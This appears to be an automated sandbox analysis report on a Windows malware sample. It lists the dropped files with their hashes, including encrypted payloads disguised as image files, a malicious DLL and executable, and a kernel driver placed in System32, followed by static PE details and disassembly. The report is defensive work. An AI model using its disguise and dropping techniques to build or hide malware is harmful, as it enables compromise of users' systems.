Encrypted:	false
SSDEEP:	192:plfK6KTBKkGUy8DJdg0ANCT/0E/jiG4hMrnv2:pBK6KTBZGWvg0ANCT/WGFv2
MD5:	9BDB6A4AF681470B85A3D46AF5A4F2A7
SHA1:	D26F6151AC12EDC6FC157CBEE69DFD378FE8BF8A
SHA-256:	5207B0111DC5CC23DA549559A8968EE36E39B5D8776E6F5B1E6BDC367937E7DF
SHA-512:	5930985458806AF51D54196F10C3A72776EFDDA5D914F60A9B7F2DD04156288D1B8C4EB63C6EFD4A9F573E48B7B9EFE98DE815629DDD64FED8D9221A6FB8AAF4
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE...............CHI........[..>G..C..&.!7..E..)U&.$...z.tuv......?..............

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\d[1].gif

Download File

Process:	C:\Users\user\Desktop\13478674376-78423498.01.exe
File Type:	PNG image data, 512 x 512, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	3892010
Entropy (8bit):	7.995495589600101
Encrypted:	true
SSDEEP:	98304:NAHrPzE9m4wgyNskyumYyryfxFVLqndnA1Nfjh:j5wgHh/nyZLN1
MD5:	E4E46F3980A9D799B1BD7FC408F488A3
SHA1:	977461A1885C7216E787E5B1E0C752DC2067733A
SHA-256:	6166EF3871E1952B05BCE5A08A1DB685E27BD83AF83B0F92AF20139DC81A4850
SHA-512:	9BF3B43D27685D59F6D5690C6CDEB5E1343F40B3739DDCACD265E1B4A5EFB2431102289E30734411DF4203121238867FDE178DA3760DA537BAF0DA07CC86FCB4
Malicious:	false
Preview:	.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........\|..z....\|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\f[1].dat

Download File

Process:	C:\Users\user\Documents\4mPVjj.exe
File Type:	data
Category:	dropped
Size (bytes):	879
Entropy (8bit):	4.5851931774575325
Encrypted:	false
SSDEEP:	6:JRSscjAQ7F3Y+ZcRC60rdimzYFAQT7LE/o2xjC:fSscjHRY+ZcRAdimzo/OY
MD5:	E54C4296F011EC91D935AA353C936E34
SHA1:	53A3313D40696E87C9B8CE2BE7E67BE49DD34C20
SHA-256:	81FF16AEDF9C5225CE8A03C0608CC3EA417795D98345699F2C240A0D67C6C33D
SHA-512:	5D1FBA60BE82A33341E5B9E7D3C1E7B0DCC9A41B4C1F97F2930141A808D62AF56D8697CB0D2FD4894A6080DF98A3E4EEF9D98A6003C292C588F547E1C6F84DE1
Malicious:	false
Preview:	.V.Wf4e111111111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW11111111111111111111.BTE5k1=I=======.NXI9g%&A&&&&&&&NRRV%lyyKK..:{ggJ..J"+$-WEBXv941HD_R!\|1=P.{r?_GBl(2%%%%%%%%%%%%%%%%%%%%%%%%%%%%%MQQU&ozzHH..9xddI..I!('.TFA[u:72KG\Q".2>S.xq<\D@n0'''''''''''''''''''''''''''''OSSW$mxxJJ..;zffK..K#%,VDCYw850IE^S }0<Q.zs>^FAo+1&&&&&&&&&&&&&&&&&&&&&&&&&&&&&NRRV%lyyKK..:{ggJ..J"+$-WEBXv941HD_R!\|1=P.{r?_GAo+1&&&&&&&&&&&&&&&&&&&&&&&&&&&&&....&&&&....&&&&....&&&9\A\999999999999999999999M[ZV$3e.-goooooooooooooooooooooooooooooooooooooo...A23"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA45(-^.[N6><!K!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\i[1].dat

Download File

Process:	C:\Users\user\Desktop\13478674376-78423498.01.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	4.954906369754221
Encrypted:	false
SSDEEP:	6:WLijU9z7Am4ewaahywLijU9z7hR4ewaVqdx9SK3TAn:j4pmIT4pVeIVR/n
MD5:	16F89B052013F0DFDDA27882DC5CFB09
SHA1:	827851573F3AD86F7ADC2E31EA293894CC808827
SHA-256:	84C5988766F80B89EBB25D6E1C4F91DD42F08BBBA91C18F2DADD84F080EF62D6
SHA-512:	988E60DC30171EB05B047C7E18E746A480D800A2BE9D1CC8D8A017EB0E2B081B3E2B5496D1A77085528DF7681F11F25614F2D2498A0DA6E9CDB4E7A852BCE744
Malicious:	false
Preview:	....l%00XTCE 7kYY.I'd:!@OFI( g(DAQ]3>.s...\=r;5S5555555555555555555555555555555]AAE6.jj....zm1p..].}>`{....rz=r....idt)JFD.d(ao.ooooooooooooooooooooooooooooooo....l%00XTCE 7kYY.I'd:!@OFI( g(DAQ]3>.s...\?r;5S5555555555555555555555555555555]AAE6.jj....zm1p..].}>`{....rz=r....idt)JFD.b(ao.ooooooooooooooooooooooooooooooo....zww5PMP5555555555555555555555555555555555555CFPY6>w=QQ======================================jROY)8=.vskz.T..................................UkUh$...2x}hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\FOM-50[1].jpg

Download File

Process:	C:\Users\user\Documents\4mPVjj.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	55085
Entropy (8bit):	7.99273647746538
Encrypted:	true
SSDEEP:	1536:puwkqL5y4p4KnRWlENc3PGdLLv/PJctIJPc+pifyC:kQM4+B/MLL/PmaG
MD5:	DC44AE348E6A74B3A74871020FDFAC74
SHA1:	B223020A5F82FF15FD5E4930477F38F34C9CB919
SHA-256:	48F258037BE0FFE663DA3BCD47DBA22094CC31940083D9E18A71882BDC1ECDB8
SHA-512:	5FB13A8CE2206119C76325504DEF61D4277A73D71D79157AE564F326D6FC18080218633CE7C708F31A81D6CD1A5AD8A903CFE1CC0C57183B4809A9C12E32A429
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{\|}~..a.....=..>.A

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\a[1].gif

Download File

Process:	C:\Users\user\Desktop\13478674376-78423498.01.exe
File Type:	PNG image data, 512 x 512, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	135589
Entropy (8bit):	7.995304392539578
Encrypted:	true
SSDEEP:	3072:CQFCJFvegK8iS+UKaskx87eJd0Cn/zUR7Tq:CKwvehSbsY8anIde
MD5:	0DDD3F02B74B01D739C45956D8FD12B7
SHA1:	561836F6228E24180238DF9456707A2443C5795C
SHA-256:	2D3C7FBB4FBA459808F20FDC293CDC09951110302111526BC467F84A6F82F8F6
SHA-512:	0D6A7700FA1B8600CAE7163EFFCD35F97B73018ECB9A17821A690C179155199689D899F8DCAD9774F486C9F28F4D127BFCA47E6D88CC72FB2CDA32F7F3D90238
Malicious:	false
Preview:	.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........\|..z....\|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\s[1].dat

Download File

Process:	C:\Users\user\Desktop\13478674376-78423498.01.exe
File Type:	data
Category:	dropped
Size (bytes):	28272
Entropy (8bit):	7.71159305323803
Encrypted:	false
SSDEEP:	384:9WegCRh1vC6FvsdvaUv2rywX0IK+H8Ku7jVolZ7XRJsKYkGDfRRX5qSgUWCHopQR:Z5F1FUdy422IK+gAZt2i0YPpQn4GMW
MD5:	C6997E0ED167603D63510A4881D6F34F
SHA1:	FD43BD534473A275A964FFAA84D54575EDA50A02
SHA-256:	C5D89EF7F90721E13273D3C56999906C043B58359C620662FA9D1245CB96A8C6
SHA-512:	F1D83EE4C29231461CB9262BD01F8FF64B1C68B2695DAC27C71C2D13274E805795F52E3D75103A9D2F050DDD12FE4051A240CD09D54F02C87B0785A8D091E829
Malicious:	false
Preview:	..(.........GG..............................................P..........{Z.z7..c_6,./]@H]<0}>_PPQ%q34.FAZz34z>5)Z75>?.225.5555555..G\.@f.z\.@f.{\.@f...\.@f...\.@f...\.@f...\.@f...\.@f...\.@f4......4444444444444444444444444dq44P.<4.g.bbbbbbbbb.b@bi`kbbXbbbpbbbbbb..bbbrbbbbcbbbbbbrbbb`bbdbcbdbcbdbcbbbbbb.bbbfbb?.bbcbbbbbfbbbbbbrbbbbbbbbrbbbbbbrbbbbbbbbbbrbbbbbbbbbbbr.bbJbbbb.bb.abbb.bb.cbbb2bb.\|bbb.bb&bbb.#bb~bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb"bb.cbbbbbbbbbbbbbbbbbbbbbbbbbbL...n....6.......4..................:..r\...gr.......S.......!..............S..[u?:/N////-///.///-///.//////////////o//......"............................................................................?.........................]s/./L///.,///.///+///e//////////////o//mC...nb...............O..............A..CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\c[1].gif

Download File

Process:	C:\Users\user\Desktop\13478674376-78423498.01.exe
File Type:	PNG image data, 512 x 512, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	10681
Entropy (8bit):	7.866148090449211
Encrypted:	false
SSDEEP:	192:fN3El4oBtN9pmD65VoeotpeGy/nmgVtKFbM/PvMZ5ZWtZl4EehHGXI9Fch5:fN3E7NW27oJWJ+M/8ZCDuEe2I9FS5
MD5:	10A818386411EE834D99AE6B7B68BE71
SHA1:	27644B42B02F00E772DCCB8D3E5C6976C4A02386
SHA-256:	7545AC54F4BDFE8A9A271D30A233F8717CA692A6797CA775DE1B7D3EAAB1E066
SHA-512:	BDC5F1C9A78CA677D8B7AFA2C2F0DE95337C5850F794B66D42CAE6641EF1F8D24D0F0E98D295F35E71EBE60760AD17DA1F682472D7E4F61613441119484EFB8F
Malicious:	false
Preview:	.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........\|..z....\|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\drops[1].jpg

Download File

Process:	C:\Users\user\Documents\4mPVjj.exe
File Type:	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	37274
Entropy (8bit):	7.991781062764932
Encrypted:	true
SSDEEP:	768:6uBASoT9gu8yCOpS/DCNuoaa7SOjrX+ACdA7EtGKDRklnvga371DNpnN7s:fGSfyxENa7ZCRtxylnvgAVNI
MD5:	6D4DEB9526F3973DE0F9DCE9392F8EA7
SHA1:	520128FB9BAB7064BEA992E4427B924073E58C0E
SHA-256:	B415D73DC6CBEEE59736ADD1AF397B6982BDB2B3A9E994797EE6AF5979E58FD1
SHA-512:	F07E0DAEEE5C54BC8DB462630F46A339D9ED0AF346BAB113B4EC7FD2BC463AFC04CBD0FDFC8D9F54528B7127AA7735575A255B85F2D0B3CCD518FC5DC39BA447
Malicious:	false
Preview:	.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....\|]....Ke......G......U..1....#^..1\|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.\|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)....t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

C:\Users\user\Documents\4mPVjj.exe

Download File

Process:	C:\Users\user\Desktop\13478674376-78423498.01.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	133136
Entropy (8bit):	6.350273548571922
Encrypted:	false
SSDEEP:	3072:NtmH5WKiSogv0HSCcTwk7ZaxbXq+d1ftrt+armpQowbFqD:NYZEHG0yfTPFas+dZZrL9MD
MD5:	D3709B25AFD8AC9B63CBD4E1E1D962B9
SHA1:	6281A108C7077B198241159C632749EEC5E0ECA8
SHA-256:	D2537DC4944653EFCD48DE73961034CFD64FB7C8E1BA631A88BBA62CCCC11948
SHA-512:	625F46D37BCA0F2505F46D64E7706C27D6448B213FE8D675AD6DF1D994A87E9CEECD7FB0DEFF35FDDD87805074E3920444700F70B943FAB819770D66D9E6B7AB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.E.7w+.7w+.7w+...V.?w+...E..w+...F.Qw+...P.5w+.>...>w+.7w..w+...Y.>w+...W.6w+...S.6w+.Rich7w+.........PE..d...Kd.]..........#................P].........@............................................................................................,...x...............,........H...........D...............................................@..@............................text...)......................... ..`.rdata..x_...@...`..................@..@.data....:..........................@....pdata..,...........................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\MsMpList.dat

Download File

Process:	C:\Users\user\Desktop\13478674376-78423498.01.exe
File Type:	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	3889557
Entropy (8bit):	7.999938752066414
Encrypted:	true
SSDEEP:	98304:ZAnkiLOZS/hpXbdHpPcG59BO8NQXIeXXv5L4f2fN3yQWF+A:+ndLOZS/DtpPJRO8OHBL4f2UQI+A
MD5:	8DA36229C1EE1BCEA759BEABD8B8D403
SHA1:	61669D96C1871F6F8FA5345E965D65060BF41441
SHA-256:	2592C6C5F64E1C5301D7ED7D492FC1869A4E32ABBD1176EDE794B971A613F351
SHA-512:	3BA31FC42557FDFF99084714BFE07666DCE7123E970023282CF6BFBD8BDED7C0B1B764D4B9FF06497BBF7F3F0A273595E49163CACD64C229628B837346B9ABF6
Malicious:	false
Preview:	.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Ql.K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....\|]....Ke......G......U..1....#^..1\|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.\|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)....t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

C:\Users\user\Documents\WordpadFilter.db

Download File

Process:	C:\Users\user\Desktop\13478674376-78423498.01.exe
File Type:	GIF image data, version 89a, 10 x 10
Category:	dropped
Size (bytes):	8228
Entropy (8bit):	7.978995159476022
Encrypted:	false
SSDEEP:	192:UBue6hKvTlByz2GqpoPTgyXrByFCt4lXp9tyey2Q0l:UBuNhyTlBU2dp+1XrBuCgp9vU0l
MD5:	098026B820BF74CCEFC3F5C0BD59D0D9
SHA1:	32E98A89ED69BF2078F059B3C2355A986B20CA07
SHA-256:	8B998DA2A5ADF5C85DCB79DC4F600BF07AF2BD84E5820769AA0D8A8AFD0711B4
SHA-512:	B7B9F245865B4BA7199C4F6AA81F5C250CEA60E6A309E81104FB52465A1165FC7255D4C8BEF06FDF44F7363523C508BBE869C6BD47A8D7DB6D652E6297F2233D
Malicious:	false
Preview:	GIF89a.......,.K.........;.;G_fx5.#DV..g..}A/...l=.2......'o...!.....e.,t..o8.^...B^x..6IX.DC.Oa..../_...n$_.y..+jb..r...Y4/Rv.....(;....$...g..........~.IN ...-<R7....eZ..q4.....~...}....~t<......\|}....x.)U3.`U..s....W..WY..w+o-[..{..l..i`.:.......L'.>...$. .a.x.2#y_(9....d,....=n...%...c.........dq.nfLI....!1..2...`.,...~....)w.5E 1.V...0."...cu...p........^\|@.-w..+...M.(.GK.y}.N.........}.....-..e.......X...GE.\|.-._..*.M.....Mc........9/..fQ.Z.....W.....s...........k?C.q.u.-...Q..."..kt..A..128.......7#...~....1.`..:C.(.C.<y.(..<..'..+.!&.....r..I.....d...W.....-.'.Ec`Nv.8).....!....?.....\..N.3..D...U.....(..#sdY..D"...p.>.W.Q...}.. ..2.A('Q\_y...\|..Az..JO.B.A..Q05.)..Q..zd..V..l......S.....dS.x....z^..z...).a.....4.G..........M.,..a..U...\....G...$...Q.7...@.x...x.s..R..0.-3...).x.D..f.I..n.....}..{.p.q.%,.lF.f.Up..UM..Y..1............R.....F.._....Y..u...e^.c...f.'..U.W1g..e#J...Z.W.....w.[...........R.?.m......"@.f..V..fxI

C:\Users\user\Documents\vselog.dll

Download File

Process:	C:\Users\user\Desktop\13478674376-78423498.01.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	122880
Entropy (8bit):	6.002038584740298
Encrypted:	false
SSDEEP:	1536:Jd4E7qItA4nbQ0R3rh4Q8/0fp0uQ4S8S7YDLbnTPtrTzvesW7dj9dl4Cp52Fe:Jf7qG3Gyp0p4ZmGLbTPJT7y7aCp5ge
MD5:	B4012FF87CABB83DDECCFF015AE5C25C
SHA1:	6365813CD2115F004230494B2F934CABEC0866F5
SHA-256:	A29D89C2E02145F6F266907A13F94A118D4C0A4CBFB790B038A7A3D6DFA3D330
SHA-512:	EB96673849EB3818F656EAD1F0A8D5437129FE0DCE16747DE1CFC00408DCD4FC10F450E052A2F4DD81EB3EB9D8F2709B0386FDF2B4DF8545F4A534F79BD72D29
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d... .E .E .Ek..D%.Ek..D..Ek..D*.E0N.D).E0N.D..E0N.D..Ek..D#.E .EB.EhO.D!.EhO.D!.EhOHE!.E . E!.EhO.D!.ERich .E........PE..d....w.g.........." ...).....................................................0............`.........................................`...........(.......H.................... ..x... ...8...............................@............ ...............................text............................... ..`.rdata....... ......................@..@.data...0...........................@....pdata..............................@..@.rsrc...H...........................@..@.reloc..x.... ......................@..B........................................................................................................................................................................................................................................

C:\Windows\System32\drivers\189atohci.sys

Download File

Process:	C:\Users\user\Desktop\13478674376-78423498.01.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	28272
Entropy (8bit):	6.229180371021943
Encrypted:	false
SSDEEP:	384:A3YUY30d1Kgf4AtcTmwZ/22a97C5ohYh3IB96Oys2+l0skiM0HMFrba8no0ceD/a:AOUkgfdZ9pRyv+uPzCMHo3q4tDghE
MD5:	F539D5A216C3B990BB2D8C2DEBC770F5
SHA1:	2961CFCDB82C6895429639480D8D2F9A14403ABF
SHA-256:	38680FEEAB492F0A7A5802B48CFACFAD45DD34B4A56DFB2F16DFD0A2AD8A449A
SHA-512:	4A1B57978AD92C92465F4FF9794DAFA7F3AD5077FC8B2476EBD2B89D742BD0E4C08C07F36FE9D9AF7BABEDBD5C928A20F8F7F48B5ED70845CA0DC61F8E1BBD4C
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ri...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:Rich...:........................PE..d....S.V.........."......:..........l...............................................]...........................................................(............`.......P..p.......D....A...............................................@...............................text....,.......................... ..h.rdata.......@.......2..............@..H.data........P.......:..............@....pdata.......`.......<..............@..HPAGE....l....p.......>.............. ..`INIT.................@.............. ....rsrc................J..............@..B.reloc...............N..............@..B........................................................................................................................................................................................

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.514698984295993
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	13478674376-78423498.01.exe
File size:	31'171'152 bytes
MD5:	cb04cda738077ea40a31ea0ecfdedd43
SHA1:	605d7039c1d2f2e0c67efec779c846bf854406dd
SHA256:	a63bccb88466f212600f0b97e8fffb2bf49ceb76ee173fb6e1cac35d8dbe94f1
SHA512:	9ee9ec3009465024788422155786d6aa7c5e6f4c1b30d42cf3787043c8a5f7db7019385da096b099da54db7ebe148e2d4aec07e6532b0ec87706b925aea5738e
SSDEEP:	393216:Xw6w2cNw1JXdm9SUDDplGjlD6nHVTMlwB5VtzM43/CVpNOvG9gnXUpfN+LJ+plf2:g6AcJNNUDFojlDk1TM77NOvuH4d+pE
TLSH:	5167BE7892DC3118FD5ED371281A456947243E2829B85E8F77A5340F9E372F339A26CE
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m..q).j").j").j"..i#,.j"..o#..j"..n##.j".=i# .j".=n#9.j".=o#..j"..k#".j").k"C.j"::o#(.j"::."(.j").."(.j"::h#(.j"Rich).j".......

File Icon


Icon Hash:	0db2b2296d4cd02b

Static PE Info

General

Entrypoint:	0x140003ca8
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, TERMINAL_SERVER_AWARE
Time Stamp:	0x2203A45A [Sun Jan 31 21:47:06 1988 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	74840df8a182762a732cf2702cb5048e

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F6504D1F760h
dec eax
add esp, 28h
jmp 00007F6504D1C79Bh
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
dec eax
mov ebx, ecx
jmp 00007F6504D1F361h
dec eax
mov ecx, ebx
call 00007F6504D25A56h
test eax, eax
je 00007F6504D1F365h
dec eax
mov ecx, ebx
call 00007F6504D25ABAh
dec eax
test eax, eax
je 00007F6504D1F339h
dec eax
add esp, 20h
pop ebx
ret
dec eax
cmp ebx, FFFFFFFFh
je 00007F6504D1F358h
call 00007F6504D1FC40h
int3
call 00007F6504D1FC5Ah
int3
jmp 00007F6504D25AA0h
int3
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
dec eax
mov ebx, ecx
xor ecx, ecx
call dword ptr [000123CFh]
dec eax
mov ecx, ebx
call dword ptr [000123BEh]
call dword ptr [000123C8h]
dec eax
mov ecx, eax
mov edx, C0000409h
dec eax
add esp, 20h
pop ebx
dec eax
jmp dword ptr [000123BCh]
dec eax
mov dword ptr [esp+08h], ecx
dec eax
sub esp, 38h
mov ecx, 00000017h
call dword ptr [000123B0h]
test eax, eax
je 00007F6504D1F359h
mov ecx, 00000002h
int 29h
dec eax
lea ecx, dword ptr [0001DE66h]
call 00007F6504D1F3FEh
dec eax
mov eax, dword ptr [esp+38h]
dec eax
mov dword ptr [0001DF4Dh], eax
dec eax
lea eax, dword ptr [esp+38h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2047c	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x31000	0x79b8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x2f000	0x11c4	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
